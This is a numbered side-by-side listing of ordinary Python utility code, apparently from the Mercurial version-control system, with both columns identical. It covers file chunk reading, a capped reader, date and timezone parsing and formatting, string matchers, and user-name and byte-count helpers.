2231 chunkremaining = chunkl - offset
2231 chunkremaining = chunkl - offset
2232
2232
2233 # Use all of unconsumed part of chunk.
2233 # Use all of unconsumed part of chunk.
2234 if left >= chunkremaining:
2234 if left >= chunkremaining:
2235 left -= chunkremaining
2235 left -= chunkremaining
2236 queue.popleft()
2236 queue.popleft()
2237 # offset == 0 is enabled by block above, so this won't merely
2237 # offset == 0 is enabled by block above, so this won't merely
2238 # copy via ``chunk[0:]``.
2238 # copy via ``chunk[0:]``.
2239 buf.append(chunk[offset:])
2239 buf.append(chunk[offset:])
2240 self._chunkoffset = 0
2240 self._chunkoffset = 0
2241
2241
2242 # Partial chunk needed.
2242 # Partial chunk needed.
2243 else:
2243 else:
2244 buf.append(chunk[offset:offset + left])
2244 buf.append(chunk[offset:offset + left])
2245 self._chunkoffset += left
2245 self._chunkoffset += left
2246 left -= chunkremaining
2246 left -= chunkremaining
2247
2247
2248 return ''.join(buf)
2248 return ''.join(buf)
2249
2249
2250 def filechunkiter(f, size=131072, limit=None):
2250 def filechunkiter(f, size=131072, limit=None):
2251 """Create a generator that produces the data in the file size
2251 """Create a generator that produces the data in the file size
2252 (default 131072) bytes at a time, up to optional limit (default is
2252 (default 131072) bytes at a time, up to optional limit (default is
2253 to read all data). Chunks may be less than size bytes if the
2253 to read all data). Chunks may be less than size bytes if the
2254 chunk is the last chunk in the file, or the file is a socket or
2254 chunk is the last chunk in the file, or the file is a socket or
2255 some other type of file that sometimes reads less data than is
2255 some other type of file that sometimes reads less data than is
2256 requested."""
2256 requested."""
2257 assert size >= 0
2257 assert size >= 0
2258 assert limit is None or limit >= 0
2258 assert limit is None or limit >= 0
2259 while True:
2259 while True:
2260 if limit is None:
2260 if limit is None:
2261 nbytes = size
2261 nbytes = size
2262 else:
2262 else:
2263 nbytes = min(limit, size)
2263 nbytes = min(limit, size)
2264 s = nbytes and f.read(nbytes)
2264 s = nbytes and f.read(nbytes)
2265 if not s:
2265 if not s:
2266 break
2266 break
2267 if limit:
2267 if limit:
2268 limit -= len(s)
2268 limit -= len(s)
2269 yield s
2269 yield s
2270
2270
2271 class cappedreader(object):
2271 class cappedreader(object):
2272 """A file object proxy that allows reading up to N bytes.
2272 """A file object proxy that allows reading up to N bytes.
2273
2273
2274 Given a source file object, instances of this type allow reading up to
2274 Given a source file object, instances of this type allow reading up to
2275 N bytes from that source file object. Attempts to read past the allowed
2275 N bytes from that source file object. Attempts to read past the allowed
2276 limit are treated as EOF.
2276 limit are treated as EOF.
2277
2277
2278 It is assumed that I/O is not performed on the original file object
2278 It is assumed that I/O is not performed on the original file object
2279 in addition to I/O that is performed by this instance. If there is,
2279 in addition to I/O that is performed by this instance. If there is,
2280 state tracking will get out of sync and unexpected results will ensue.
2280 state tracking will get out of sync and unexpected results will ensue.
2281 """
2281 """
2282 def __init__(self, fh, limit):
2282 def __init__(self, fh, limit):
2283 """Allow reading up to <limit> bytes from <fh>."""
2283 """Allow reading up to <limit> bytes from <fh>."""
2284 self._fh = fh
2284 self._fh = fh
2285 self._left = limit
2285 self._left = limit
2286
2286
2287 def read(self, n=-1):
2287 def read(self, n=-1):
2288 if not self._left:
2288 if not self._left:
2289 return b''
2289 return b''
2290
2290
2291 if n < 0:
2291 if n < 0:
2292 n = self._left
2292 n = self._left
2293
2293
2294 data = self._fh.read(min(n, self._left))
2294 data = self._fh.read(min(n, self._left))
2295 self._left -= len(data)
2295 self._left -= len(data)
2296 assert self._left >= 0
2296 assert self._left >= 0
2297
2297
2298 return data
2298 return data
2299
2299
2300 def makedate(timestamp=None):
2300 def makedate(timestamp=None):
2301 '''Return a unix timestamp (or the current time) as a (unixtime,
2301 '''Return a unix timestamp (or the current time) as a (unixtime,
2302 offset) tuple based off the local timezone.'''
2302 offset) tuple based off the local timezone.'''
2303 if timestamp is None:
2303 if timestamp is None:
2304 timestamp = time.time()
2304 timestamp = time.time()
2305 if timestamp < 0:
2305 if timestamp < 0:
2306 hint = _("check your clock")
2306 hint = _("check your clock")
2307 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2307 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2308 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2308 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2309 datetime.datetime.fromtimestamp(timestamp))
2309 datetime.datetime.fromtimestamp(timestamp))
2310 tz = delta.days * 86400 + delta.seconds
2310 tz = delta.days * 86400 + delta.seconds
2311 return timestamp, tz
2311 return timestamp, tz
2312
2312
2313 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2313 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2314 """represent a (unixtime, offset) tuple as a localized time.
2314 """represent a (unixtime, offset) tuple as a localized time.
2315 unixtime is seconds since the epoch, and offset is the time zone's
2315 unixtime is seconds since the epoch, and offset is the time zone's
2316 number of seconds away from UTC.
2316 number of seconds away from UTC.
2317
2317
2318 >>> datestr((0, 0))
2318 >>> datestr((0, 0))
2319 'Thu Jan 01 00:00:00 1970 +0000'
2319 'Thu Jan 01 00:00:00 1970 +0000'
2320 >>> datestr((42, 0))
2320 >>> datestr((42, 0))
2321 'Thu Jan 01 00:00:42 1970 +0000'
2321 'Thu Jan 01 00:00:42 1970 +0000'
2322 >>> datestr((-42, 0))
2322 >>> datestr((-42, 0))
2323 'Wed Dec 31 23:59:18 1969 +0000'
2323 'Wed Dec 31 23:59:18 1969 +0000'
2324 >>> datestr((0x7fffffff, 0))
2324 >>> datestr((0x7fffffff, 0))
2325 'Tue Jan 19 03:14:07 2038 +0000'
2325 'Tue Jan 19 03:14:07 2038 +0000'
2326 >>> datestr((-0x80000000, 0))
2326 >>> datestr((-0x80000000, 0))
2327 'Fri Dec 13 20:45:52 1901 +0000'
2327 'Fri Dec 13 20:45:52 1901 +0000'
2328 """
2328 """
2329 t, tz = date or makedate()
2329 t, tz = date or makedate()
2330 if "%1" in format or "%2" in format or "%z" in format:
2330 if "%1" in format or "%2" in format or "%z" in format:
2331 sign = (tz > 0) and "-" or "+"
2331 sign = (tz > 0) and "-" or "+"
2332 minutes = abs(tz) // 60
2332 minutes = abs(tz) // 60
2333 q, r = divmod(minutes, 60)
2333 q, r = divmod(minutes, 60)
2334 format = format.replace("%z", "%1%2")
2334 format = format.replace("%z", "%1%2")
2335 format = format.replace("%1", "%c%02d" % (sign, q))
2335 format = format.replace("%1", "%c%02d" % (sign, q))
2336 format = format.replace("%2", "%02d" % r)
2336 format = format.replace("%2", "%02d" % r)
2337 d = t - tz
2337 d = t - tz
2338 if d > 0x7fffffff:
2338 if d > 0x7fffffff:
2339 d = 0x7fffffff
2339 d = 0x7fffffff
2340 elif d < -0x80000000:
2340 elif d < -0x80000000:
2341 d = -0x80000000
2341 d = -0x80000000
2342 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2342 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2343 # because they use the gmtime() system call which is buggy on Windows
2343 # because they use the gmtime() system call which is buggy on Windows
2344 # for negative values.
2344 # for negative values.
2345 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2345 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2346 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2346 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2347 return s
2347 return s
2348
2348
2349 def shortdate(date=None):
2349 def shortdate(date=None):
2350 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2350 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2351 return datestr(date, format='%Y-%m-%d')
2351 return datestr(date, format='%Y-%m-%d')
2352
2352
2353 def parsetimezone(s):
2353 def parsetimezone(s):
2354 """find a trailing timezone, if any, in string, and return a
2354 """find a trailing timezone, if any, in string, and return a
2355 (offset, remainder) pair"""
2355 (offset, remainder) pair"""
2356 s = pycompat.bytestr(s)
2356 s = pycompat.bytestr(s)
2357
2357
2358 if s.endswith("GMT") or s.endswith("UTC"):
2358 if s.endswith("GMT") or s.endswith("UTC"):
2359 return 0, s[:-3].rstrip()
2359 return 0, s[:-3].rstrip()
2360
2360
2361 # Unix-style timezones [+-]hhmm
2361 # Unix-style timezones [+-]hhmm
2362 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2362 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2363 sign = (s[-5] == "+") and 1 or -1
2363 sign = (s[-5] == "+") and 1 or -1
2364 hours = int(s[-4:-2])
2364 hours = int(s[-4:-2])
2365 minutes = int(s[-2:])
2365 minutes = int(s[-2:])
2366 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2366 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2367
2367
2368 # ISO8601 trailing Z
2368 # ISO8601 trailing Z
2369 if s.endswith("Z") and s[-2:-1].isdigit():
2369 if s.endswith("Z") and s[-2:-1].isdigit():
2370 return 0, s[:-1]
2370 return 0, s[:-1]
2371
2371
2372 # ISO8601-style [+-]hh:mm
2372 # ISO8601-style [+-]hh:mm
2373 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2373 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2374 s[-5:-3].isdigit() and s[-2:].isdigit()):
2374 s[-5:-3].isdigit() and s[-2:].isdigit()):
2375 sign = (s[-6] == "+") and 1 or -1
2375 sign = (s[-6] == "+") and 1 or -1
2376 hours = int(s[-5:-3])
2376 hours = int(s[-5:-3])
2377 minutes = int(s[-2:])
2377 minutes = int(s[-2:])
2378 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2378 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2379
2379
2380 return None, s
2380 return None, s
2381
2381
2382 def strdate(string, format, defaults=None):
2382 def strdate(string, format, defaults=None):
2383 """parse a localized time string and return a (unixtime, offset) tuple.
2383 """parse a localized time string and return a (unixtime, offset) tuple.
2384 if the string cannot be parsed, ValueError is raised."""
2384 if the string cannot be parsed, ValueError is raised."""
2385 if defaults is None:
2385 if defaults is None:
2386 defaults = {}
2386 defaults = {}
2387
2387
2388 # NOTE: unixtime = localunixtime + offset
2388 # NOTE: unixtime = localunixtime + offset
2389 offset, date = parsetimezone(string)
2389 offset, date = parsetimezone(string)
2390
2390
2391 # add missing elements from defaults
2391 # add missing elements from defaults
2392 usenow = False # default to using biased defaults
2392 usenow = False # default to using biased defaults
2393 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2393 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2394 part = pycompat.bytestr(part)
2394 part = pycompat.bytestr(part)
2395 found = [True for p in part if ("%"+p) in format]
2395 found = [True for p in part if ("%"+p) in format]
2396 if not found:
2396 if not found:
2397 date += "@" + defaults[part][usenow]
2397 date += "@" + defaults[part][usenow]
2398 format += "@%" + part[0]
2398 format += "@%" + part[0]
2399 else:
2399 else:
2400 # We've found a specific time element, less specific time
2400 # We've found a specific time element, less specific time
2401 # elements are relative to today
2401 # elements are relative to today
2402 usenow = True
2402 usenow = True
2403
2403
2404 timetuple = time.strptime(encoding.strfromlocal(date),
2404 timetuple = time.strptime(encoding.strfromlocal(date),
2405 encoding.strfromlocal(format))
2405 encoding.strfromlocal(format))
2406 localunixtime = int(calendar.timegm(timetuple))
2406 localunixtime = int(calendar.timegm(timetuple))
2407 if offset is None:
2407 if offset is None:
2408 # local timezone
2408 # local timezone
2409 unixtime = int(time.mktime(timetuple))
2409 unixtime = int(time.mktime(timetuple))
2410 offset = unixtime - localunixtime
2410 offset = unixtime - localunixtime
2411 else:
2411 else:
2412 unixtime = localunixtime + offset
2412 unixtime = localunixtime + offset
2413 return unixtime, offset
2413 return unixtime, offset
2414
2414
2415 def parsedate(date, formats=None, bias=None):
2415 def parsedate(date, formats=None, bias=None):
2416 """parse a localized date/time and return a (unixtime, offset) tuple.
2416 """parse a localized date/time and return a (unixtime, offset) tuple.
2417
2417
2418 The date may be a "unixtime offset" string or in one of the specified
2418 The date may be a "unixtime offset" string or in one of the specified
2419 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2419 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2420
2420
2421 >>> parsedate(b' today ') == parsedate(
2421 >>> parsedate(b' today ') == parsedate(
2422 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2422 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2423 True
2423 True
2424 >>> parsedate(b'yesterday ') == parsedate(
2424 >>> parsedate(b'yesterday ') == parsedate(
2425 ... (datetime.date.today() - datetime.timedelta(days=1)
2425 ... (datetime.date.today() - datetime.timedelta(days=1)
2426 ... ).strftime('%b %d').encode('ascii'))
2426 ... ).strftime('%b %d').encode('ascii'))
2427 True
2427 True
2428 >>> now, tz = makedate()
2428 >>> now, tz = makedate()
2429 >>> strnow, strtz = parsedate(b'now')
2429 >>> strnow, strtz = parsedate(b'now')
2430 >>> (strnow - now) < 1
2430 >>> (strnow - now) < 1
2431 True
2431 True
2432 >>> tz == strtz
2432 >>> tz == strtz
2433 True
2433 True
2434 """
2434 """
2435 if bias is None:
2435 if bias is None:
2436 bias = {}
2436 bias = {}
2437 if not date:
2437 if not date:
2438 return 0, 0
2438 return 0, 0
2439 if isinstance(date, tuple) and len(date) == 2:
2439 if isinstance(date, tuple) and len(date) == 2:
2440 return date
2440 return date
2441 if not formats:
2441 if not formats:
2442 formats = defaultdateformats
2442 formats = defaultdateformats
2443 date = date.strip()
2443 date = date.strip()
2444
2444
2445 if date == 'now' or date == _('now'):
2445 if date == 'now' or date == _('now'):
2446 return makedate()
2446 return makedate()
2447 if date == 'today' or date == _('today'):
2447 if date == 'today' or date == _('today'):
2448 date = datetime.date.today().strftime(r'%b %d')
2448 date = datetime.date.today().strftime(r'%b %d')
2449 date = encoding.strtolocal(date)
2449 date = encoding.strtolocal(date)
2450 elif date == 'yesterday' or date == _('yesterday'):
2450 elif date == 'yesterday' or date == _('yesterday'):
2451 date = (datetime.date.today() -
2451 date = (datetime.date.today() -
2452 datetime.timedelta(days=1)).strftime(r'%b %d')
2452 datetime.timedelta(days=1)).strftime(r'%b %d')
2453 date = encoding.strtolocal(date)
2453 date = encoding.strtolocal(date)
2454
2454
2455 try:
2455 try:
2456 when, offset = map(int, date.split(' '))
2456 when, offset = map(int, date.split(' '))
2457 except ValueError:
2457 except ValueError:
2458 # fill out defaults
2458 # fill out defaults
2459 now = makedate()
2459 now = makedate()
2460 defaults = {}
2460 defaults = {}
2461 for part in ("d", "mb", "yY", "HI", "M", "S"):
2461 for part in ("d", "mb", "yY", "HI", "M", "S"):
2462 # this piece is for rounding the specific end of unknowns
2462 # this piece is for rounding the specific end of unknowns
2463 b = bias.get(part)
2463 b = bias.get(part)
2464 if b is None:
2464 if b is None:
2465 if part[0:1] in "HMS":
2465 if part[0:1] in "HMS":
2466 b = "00"
2466 b = "00"
2467 else:
2467 else:
2468 b = "0"
2468 b = "0"
2469
2469
2470 # this piece is for matching the generic end to today's date
2470 # this piece is for matching the generic end to today's date
2471 n = datestr(now, "%" + part[0:1])
2471 n = datestr(now, "%" + part[0:1])
2472
2472
2473 defaults[part] = (b, n)
2473 defaults[part] = (b, n)
2474
2474
2475 for format in formats:
2475 for format in formats:
2476 try:
2476 try:
2477 when, offset = strdate(date, format, defaults)
2477 when, offset = strdate(date, format, defaults)
2478 except (ValueError, OverflowError):
2478 except (ValueError, OverflowError):
2479 pass
2479 pass
2480 else:
2480 else:
2481 break
2481 break
2482 else:
2482 else:
2483 raise error.ParseError(
2483 raise error.ParseError(
2484 _('invalid date: %r') % pycompat.bytestr(date))
2484 _('invalid date: %r') % pycompat.bytestr(date))
2485 # validate explicit (probably user-specified) date and
2485 # validate explicit (probably user-specified) date and
2486 # time zone offset. values must fit in signed 32 bits for
2486 # time zone offset. values must fit in signed 32 bits for
2487 # current 32-bit linux runtimes. timezones go from UTC-12
2487 # current 32-bit linux runtimes. timezones go from UTC-12
2488 # to UTC+14
2488 # to UTC+14
2489 if when < -0x80000000 or when > 0x7fffffff:
2489 if when < -0x80000000 or when > 0x7fffffff:
2490 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2490 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2491 if offset < -50400 or offset > 43200:
2491 if offset < -50400 or offset > 43200:
2492 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2492 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2493 return when, offset
2493 return when, offset
2494
2494
2495 def matchdate(date):
2495 def matchdate(date):
2496 """Return a function that matches a given date match specifier
2496 """Return a function that matches a given date match specifier
2497
2497
2498 Formats include:
2498 Formats include:
2499
2499
2500 '{date}' match a given date to the accuracy provided
2500 '{date}' match a given date to the accuracy provided
2501
2501
2502 '<{date}' on or before a given date
2502 '<{date}' on or before a given date
2503
2503
2504 '>{date}' on or after a given date
2504 '>{date}' on or after a given date
2505
2505
2506 >>> p1 = parsedate(b"10:29:59")
2506 >>> p1 = parsedate(b"10:29:59")
2507 >>> p2 = parsedate(b"10:30:00")
2507 >>> p2 = parsedate(b"10:30:00")
2508 >>> p3 = parsedate(b"10:30:59")
2508 >>> p3 = parsedate(b"10:30:59")
2509 >>> p4 = parsedate(b"10:31:00")
2509 >>> p4 = parsedate(b"10:31:00")
2510 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2510 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2511 >>> f = matchdate(b"10:30")
2511 >>> f = matchdate(b"10:30")
2512 >>> f(p1[0])
2512 >>> f(p1[0])
2513 False
2513 False
2514 >>> f(p2[0])
2514 >>> f(p2[0])
2515 True
2515 True
2516 >>> f(p3[0])
2516 >>> f(p3[0])
2517 True
2517 True
2518 >>> f(p4[0])
2518 >>> f(p4[0])
2519 False
2519 False
2520 >>> f(p5[0])
2520 >>> f(p5[0])
2521 False
2521 False
2522 """
2522 """
2523
2523
2524 def lower(date):
2524 def lower(date):
2525 d = {'mb': "1", 'd': "1"}
2525 d = {'mb': "1", 'd': "1"}
2526 return parsedate(date, extendeddateformats, d)[0]
2526 return parsedate(date, extendeddateformats, d)[0]
2527
2527
2528 def upper(date):
2528 def upper(date):
2529 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2529 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2530 for days in ("31", "30", "29"):
2530 for days in ("31", "30", "29"):
2531 try:
2531 try:
2532 d["d"] = days
2532 d["d"] = days
2533 return parsedate(date, extendeddateformats, d)[0]
2533 return parsedate(date, extendeddateformats, d)[0]
2534 except error.ParseError:
2534 except error.ParseError:
2535 pass
2535 pass
2536 d["d"] = "28"
2536 d["d"] = "28"
2537 return parsedate(date, extendeddateformats, d)[0]
2537 return parsedate(date, extendeddateformats, d)[0]
2538
2538
2539 date = date.strip()
2539 date = date.strip()
2540
2540
2541 if not date:
2541 if not date:
2542 raise Abort(_("dates cannot consist entirely of whitespace"))
2542 raise Abort(_("dates cannot consist entirely of whitespace"))
2543 elif date[0] == "<":
2543 elif date[0] == "<":
2544 if not date[1:]:
2544 if not date[1:]:
2545 raise Abort(_("invalid day spec, use '<DATE'"))
2545 raise Abort(_("invalid day spec, use '<DATE'"))
2546 when = upper(date[1:])
2546 when = upper(date[1:])
2547 return lambda x: x <= when
2547 return lambda x: x <= when
2548 elif date[0] == ">":
2548 elif date[0] == ">":
2549 if not date[1:]:
2549 if not date[1:]:
2550 raise Abort(_("invalid day spec, use '>DATE'"))
2550 raise Abort(_("invalid day spec, use '>DATE'"))
2551 when = lower(date[1:])
2551 when = lower(date[1:])
2552 return lambda x: x >= when
2552 return lambda x: x >= when
2553 elif date[0] == "-":
2553 elif date[0] == "-":
2554 try:
2554 try:
2555 days = int(date[1:])
2555 days = int(date[1:])
2556 except ValueError:
2556 except ValueError:
2557 raise Abort(_("invalid day spec: %s") % date[1:])
2557 raise Abort(_("invalid day spec: %s") % date[1:])
2558 if days < 0:
2558 if days < 0:
2559 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2559 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2560 % date[1:])
2560 % date[1:])
2561 when = makedate()[0] - days * 3600 * 24
2561 when = makedate()[0] - days * 3600 * 24
2562 return lambda x: x >= when
2562 return lambda x: x >= when
2563 elif " to " in date:
2563 elif " to " in date:
2564 a, b = date.split(" to ")
2564 a, b = date.split(" to ")
2565 start, stop = lower(a), upper(b)
2565 start, stop = lower(a), upper(b)
2566 return lambda x: x >= start and x <= stop
2566 return lambda x: x >= start and x <= stop
2567 else:
2567 else:
2568 start, stop = lower(date), upper(date)
2568 start, stop = lower(date), upper(date)
2569 return lambda x: x >= start and x <= stop
2569 return lambda x: x >= start and x <= stop
2570
2570
2571 def stringmatcher(pattern, casesensitive=True):
2571 def stringmatcher(pattern, casesensitive=True):
2572 """
2572 """
2573 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2573 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2574 returns the matcher name, pattern, and matcher function.
2574 returns the matcher name, pattern, and matcher function.
2575 missing or unknown prefixes are treated as literal matches.
2575 missing or unknown prefixes are treated as literal matches.
2576
2576
2577 helper for tests:
2577 helper for tests:
2578 >>> def test(pattern, *tests):
2578 >>> def test(pattern, *tests):
2579 ... kind, pattern, matcher = stringmatcher(pattern)
2579 ... kind, pattern, matcher = stringmatcher(pattern)
2580 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2580 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2581 >>> def itest(pattern, *tests):
2581 >>> def itest(pattern, *tests):
2582 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2582 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2583 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2583 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2584
2584
2585 exact matching (no prefix):
2585 exact matching (no prefix):
2586 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2586 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2587 ('literal', 'abcdefg', [False, False, True])
2587 ('literal', 'abcdefg', [False, False, True])
2588
2588
2589 regex matching ('re:' prefix)
2589 regex matching ('re:' prefix)
2590 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2590 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2591 ('re', 'a.+b', [False, False, True])
2591 ('re', 'a.+b', [False, False, True])
2592
2592
2593 force exact matches ('literal:' prefix)
2593 force exact matches ('literal:' prefix)
2594 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2594 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2595 ('literal', 're:foobar', [False, True])
2595 ('literal', 're:foobar', [False, True])
2596
2596
2597 unknown prefixes are ignored and treated as literals
2597 unknown prefixes are ignored and treated as literals
2598 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2598 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2599 ('literal', 'foo:bar', [False, False, True])
2599 ('literal', 'foo:bar', [False, False, True])
2600
2600
2601 case insensitive regex matches
2601 case insensitive regex matches
2602 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2602 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2603 ('re', 'A.+b', [False, False, True])
2603 ('re', 'A.+b', [False, False, True])
2604
2604
2605 case insensitive literal matches
2605 case insensitive literal matches
2606 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2606 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2607 ('literal', 'ABCDEFG', [False, False, True])
2607 ('literal', 'ABCDEFG', [False, False, True])
2608 """
2608 """
2609 if pattern.startswith('re:'):
2609 if pattern.startswith('re:'):
2610 pattern = pattern[3:]
2610 pattern = pattern[3:]
2611 try:
2611 try:
2612 flags = 0
2612 flags = 0
2613 if not casesensitive:
2613 if not casesensitive:
2614 flags = remod.I
2614 flags = remod.I
2615 regex = remod.compile(pattern, flags)
2615 regex = remod.compile(pattern, flags)
2616 except remod.error as e:
2616 except remod.error as e:
2617 raise error.ParseError(_('invalid regular expression: %s')
2617 raise error.ParseError(_('invalid regular expression: %s')
2618 % e)
2618 % e)
2619 return 're', pattern, regex.search
2619 return 're', pattern, regex.search
2620 elif pattern.startswith('literal:'):
2620 elif pattern.startswith('literal:'):
2621 pattern = pattern[8:]
2621 pattern = pattern[8:]
2622
2622
2623 match = pattern.__eq__
2623 match = pattern.__eq__
2624
2624
2625 if not casesensitive:
2625 if not casesensitive:
2626 ipat = encoding.lower(pattern)
2626 ipat = encoding.lower(pattern)
2627 match = lambda s: ipat == encoding.lower(s)
2627 match = lambda s: ipat == encoding.lower(s)
2628 return 'literal', pattern, match
2628 return 'literal', pattern, match
2629
2629
2630 def shortuser(user):
2630 def shortuser(user):
2631 """Return a short representation of a user name or email address."""
2631 """Return a short representation of a user name or email address."""
2632 f = user.find('@')
2632 f = user.find('@')
2633 if f >= 0:
2633 if f >= 0:
2634 user = user[:f]
2634 user = user[:f]
2635 f = user.find('<')
2635 f = user.find('<')
2636 if f >= 0:
2636 if f >= 0:
2637 user = user[f + 1:]
2637 user = user[f + 1:]
2638 f = user.find(' ')
2638 f = user.find(' ')
2639 if f >= 0:
2639 if f >= 0:
2640 user = user[:f]
2640 user = user[:f]
2641 f = user.find('.')
2641 f = user.find('.')
2642 if f >= 0:
2642 if f >= 0:
2643 user = user[:f]
2643 user = user[:f]
2644 return user
2644 return user
2645
2645
2646 def emailuser(user):
2646 def emailuser(user):
2647 """Return the user portion of an email address."""
2647 """Return the user portion of an email address."""
2648 f = user.find('@')
2648 f = user.find('@')
2649 if f >= 0:
2649 if f >= 0:
2650 user = user[:f]
2650 user = user[:f]
2651 f = user.find('<')
2651 f = user.find('<')
2652 if f >= 0:
2652 if f >= 0:
2653 user = user[f + 1:]
2653 user = user[f + 1:]
2654 return user
2654 return user
2655
2655
2656 def email(author):
2656 def email(author):
2657 '''get email of author.'''
2657 '''get email of author.'''
2658 r = author.find('>')
2658 r = author.find('>')
2659 if r == -1:
2659 if r == -1:
2660 r = None
2660 r = None
2661 return author[author.find('<') + 1:r]
2661 return author[author.find('<') + 1:r]
2662
2662
2663 def ellipsis(text, maxlength=400):
2663 def ellipsis(text, maxlength=400):
2664 """Trim string to at most maxlength (default: 400) columns in display."""
2664 """Trim string to at most maxlength (default: 400) columns in display."""
2665 return encoding.trim(text, maxlength, ellipsis='...')
2665 return encoding.trim(text, maxlength, ellipsis='...')
2666
2666
2667 def unitcountfn(*unittable):
2667 def unitcountfn(*unittable):
2668 '''return a function that renders a readable count of some quantity'''
2668 '''return a function that renders a readable count of some quantity'''
2669
2669
2670 def go(count):
2670 def go(count):
2671 for multiplier, divisor, format in unittable:
2671 for multiplier, divisor, format in unittable:
2672 if abs(count) >= divisor * multiplier:
2672 if abs(count) >= divisor * multiplier:
2673 return format % (count / float(divisor))
2673 return format % (count / float(divisor))
2674 return unittable[-1][2] % count
2674 return unittable[-1][2] % count
2675
2675
2676 return go
2676 return go
2677
2677
2678 def processlinerange(fromline, toline):
2678 def processlinerange(fromline, toline):
2679 """Check that linerange <fromline>:<toline> makes sense and return a
2679 """Check that linerange <fromline>:<toline> makes sense and return a
2680 0-based range.
2680 0-based range.
2681
2681
2682 >>> processlinerange(10, 20)
2682 >>> processlinerange(10, 20)
2683 (9, 20)
2683 (9, 20)
2684 >>> processlinerange(2, 1)
2684 >>> processlinerange(2, 1)
2685 Traceback (most recent call last):
2685 Traceback (most recent call last):
2686 ...
2686 ...
2687 ParseError: line range must be positive
2687 ParseError: line range must be positive
2688 >>> processlinerange(0, 5)
2688 >>> processlinerange(0, 5)
2689 Traceback (most recent call last):
2689 Traceback (most recent call last):
2690 ...
2690 ...
2691 ParseError: fromline must be strictly positive
2691 ParseError: fromline must be strictly positive
2692 """
2692 """
2693 if toline - fromline < 0:
2693 if toline - fromline < 0:
2694 raise error.ParseError(_("line range must be positive"))
2694 raise error.ParseError(_("line range must be positive"))
2695 if fromline < 1:
2695 if fromline < 1:
2696 raise error.ParseError(_("fromline must be strictly positive"))
2696 raise error.ParseError(_("fromline must be strictly positive"))
2697 return fromline - 1, toline
2697 return fromline - 1, toline
2698
2698
2699 bytecount = unitcountfn(
2699 bytecount = unitcountfn(
2700 (100, 1 << 30, _('%.0f GB')),
2700 (100, 1 << 30, _('%.0f GB')),
2701 (10, 1 << 30, _('%.1f GB')),
2701 (10, 1 << 30, _('%.1f GB')),
2702 (1, 1 << 30, _('%.2f GB')),
2702 (1, 1 << 30, _('%.2f GB')),
2703 (100, 1 << 20, _('%.0f MB')),
2703 (100, 1 << 20, _('%.0f MB')),
2704 (10, 1 << 20, _('%.1f MB')),
2704 (10, 1 << 20, _('%.1f MB')),
2705 (1, 1 << 20, _('%.2f MB')),
2705 (1, 1 << 20, _('%.2f MB')),
2706 (100, 1 << 10, _('%.0f KB')),
2706 (100, 1 << 10, _('%.0f KB')),
2707 (10, 1 << 10, _('%.1f KB')),
2707 (10, 1 << 10, _('%.1f KB')),
2708 (1, 1 << 10, _('%.2f KB')),
2708 (1, 1 << 10, _('%.2f KB')),
2709 (1, 1, _('%.0f bytes')),
2709 (1, 1, _('%.0f bytes')),
2710 )
2710 )
2711
2711
2712 # Matches a single EOL which can either be a CRLF where repeated CR
2712 # Matches a single EOL which can either be a CRLF where repeated CR
2713 # are removed or a LF. We do not care about old Macintosh files, so a
2713 # are removed or a LF. We do not care about old Macintosh files, so a
2714 # stray CR is an error.
2714 # stray CR is an error.
